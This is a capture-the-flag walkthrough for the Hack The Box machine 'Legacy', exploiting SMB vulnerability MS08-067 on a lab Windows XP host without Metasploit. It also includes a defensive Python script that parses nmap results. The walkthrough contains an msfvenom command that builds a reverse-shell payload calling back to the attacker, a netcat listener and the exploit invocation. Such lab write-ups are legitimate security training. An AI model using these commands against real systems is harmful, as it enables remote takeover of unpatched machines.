# Hack The Box - Legacy Walkthrough without Metasploit

![Legacy](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MP8e5luoN0lBhM2CQma%2F-MP8vf-zNPaK0WLY8g56%2Fimage.png?alt=media\&token=50817cff-37e9-49a0-b8fe-749e8138a46f)

## Enumeration

We start using nmap to enumerate the box with the following flags:

-sC   Script scan, equivalent to --script=default

-sV   Service version info

-A     Enable OS detection, version detection, script scanning, and traceroute (note that -A already implies -sV and -sC, so the extra flags are redundant here but harmless)

```
nmap -sC -sV -A 10.10.10.4
```

![Legacy enumeration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MP8vm3u20I3au6vXHlX%2F-MPAT9veiSFXsYLWS-gD%2Fimage.png?alt=media\&token=81251ff0-0ad9-4436-9cef-7fcfa9240119)

SMB port 445 is open, so we can run nmap again with the SMB vulnerability scripts against that port. The OS detection output will be useful later.

```
nmap --script smb-vuln* -p445 10.10.10.4
```

Since there are multiple smb-vuln scripts, the trailing **\*** is a wildcard that runs all of them on port 445 of our victim box. If a file in the current directory happens to match that pattern the shell will expand it before nmap sees it, so quoting the argument (`--script "smb-vuln*"`) is the safer habit.

![WannaCry Vulnerability](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MP8vm3u20I3au6vXHlX%2F-MPARP3l4kXZ8UBV3xRe%2Fimage.png?alt=media\&token=4a6db613-748e-4879-8613-9f21f9cacf18)

The box is vulnerable to CVE-2008-4250 (MS08-067), which affects the operating systems that nmap reported as the most likely match for our victim.
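When the same smb-vuln scan is run against more than one host, triaging the output by hand gets tedious. The following script is an added example, not part of the original walkthrough or of nmap: it parses the XML that `nmap -oX` writes and lists which hosts the smb-vuln scripts actually flagged as vulnerable, so the results can be handed to whoever tracks patching. The XML below is a constructed sample in the shape nmap's vulns library emits for host scripts (the script id and CVE-2008-4250 come from the page; the second host address and the MS10-054 entry are made up for illustration).

```python
"""Triage nmap XML output for smb-vuln-* script results (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample modelled on what
#   nmap --script "smb-vuln*" -p445 -oX scan.xml <targets>
# produces. Only the elements this script reads are included.
SAMPLE_XML = """
<nmaprun scanner="nmap">
  <host>
    <address addr="10.10.10.4" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms08-067" output="VULNERABLE: MS08-067">
        <table key="CVE-2008-4250">
          <elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
      <script id="smb-vuln-ms10-054" output="NOT VULNERABLE">
        <table key="CVE-2010-2550">
          <elem key="state">NOT VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.10.10.99" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms08-067" output="NOT VULNERABLE">
        <table key="CVE-2008-4250">
          <elem key="state">NOT VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""

# States the nmap vulns library uses that mean "act on this".
# str.startswith with a tuple also matches "VULNERABLE (Exploitable)" etc.
VULN_STATES = ("VULNERABLE", "LIKELY VULNERABLE")


def parse_smb_vuln_findings(xml_text):
    """Return one dict per smb-vuln-* result: host, script, vuln_id, state."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        # smb-vuln scripts report as host scripts, but iterating over every
        # <script> under the host also catches port-level script output.
        for script in host.iter("script"):
            sid = script.get("id", "")
            if not sid.startswith("smb-vuln-"):
                continue
            tables = script.findall("table")
            if not tables:
                # Script ran but produced no structured result (e.g. an error).
                findings.append({"host": addr, "script": sid,
                                 "vuln_id": None, "state": "UNKNOWN"})
                continue
            for table in tables:
                state_el = table.find("elem[@key='state']")
                state = (state_el.text.strip()
                         if state_el is not None and state_el.text else "UNKNOWN")
                findings.append({"host": addr, "script": sid,
                                 "vuln_id": table.get("key"), "state": state})
    return findings


def vulnerable_hosts(findings):
    """Map host -> sorted vuln ids whose state is VULNERABLE or LIKELY VULNERABLE."""
    out = {}
    for f in findings:
        if f["state"].startswith(VULN_STATES):
            out.setdefault(f["host"], []).append(f["vuln_id"])
    return {host: sorted(ids) for host, ids in out.items()}


if __name__ == "__main__":
    results = parse_smb_vuln_findings(SAMPLE_XML)
    for host, ids in vulnerable_hosts(results).items():
        print(f"{host}: {', '.join(ids)}")
```

Running it against the sample prints only `10.10.10.4: CVE-2008-4250`; the NOT VULNERABLE entries and the clean second host are parsed but filtered out, which is the distinction a patch tracker needs.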

### Finding the PoC

With a quick google search we can find this github repository:

#### <https://github.com/andyacer/ms08_067/>

It's a great resource: it lets us drop in our own msfvenom payload and run it in order to exploit the vulnerability.

### Modifying the PoC

This generates a reverse TCP shell payload for 32-bit Windows in C-array format, excluding the bad characters listed after the -b flag.

```
msfvenom -p windows/shell_reverse_tcp LHOST=<Attackers-IP> LPORT=<Attackers-Port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
```

![PoC](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPAVVO7A5iUcikVZNqz%2F-MPAfJi9wyvOMc2P8sEr%2Fimage.png?alt=media\&token=892ab831-9218-4c0d-bb41-8969115afaf4)

This part of the exploit is the one we will replace with our own msfvenom payload.

### Executing the PoC

First we need a netcat listener already running in order to catch the reverse TCP shell.

```
nc -nvlp 443
```

![Netcat Listener](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPAVVO7A5iUcikVZNqz%2F-MPAxtQ5LoIJSCaf7Og3%2Fimage.png?alt=media\&token=6f8d7df7-a455-4f9f-9d12-d5e73f3d21a8)

We might run into this problem while trying to execute the exploit:

![Missing libraries](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPAVVO7A5iUcikVZNqz%2F-MPAhKrJAuGAOVi3bVAQ%2Fimage.png?alt=media\&token=834ca3e8-738e-4bb9-b3a8-509b3171c8b4)

In order to fix it we just need to install **Impacket** and **PyCrypto.**

For Impacket:

```
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
pip install .
```

For PyCrypto:

```
pip install pycrypto
```

Once that is fixed we can execute it with the required arguments.

![Payload Options](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPAVVO7A5iUcikVZNqz%2F-MPAxIaxvJlrTRSTiB7M%2Fimage.png?alt=media\&token=0eef5040-a2dc-4188-afc1-c48a9039b700)

According to our previous enumeration, the box was most likely Windows XP SP3, so we tried option 6.

```
python ms08_067_2018.py 10.10.10.4 6 445
```

## Pwnd

![Own the box](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPAVVO7A5iUcikVZNqz%2F-MPAwheaQ45U3I5TJfbc%2Fimage.png?alt=media\&token=c36b926c-ed84-416e-9e75-317e88f1c63b)
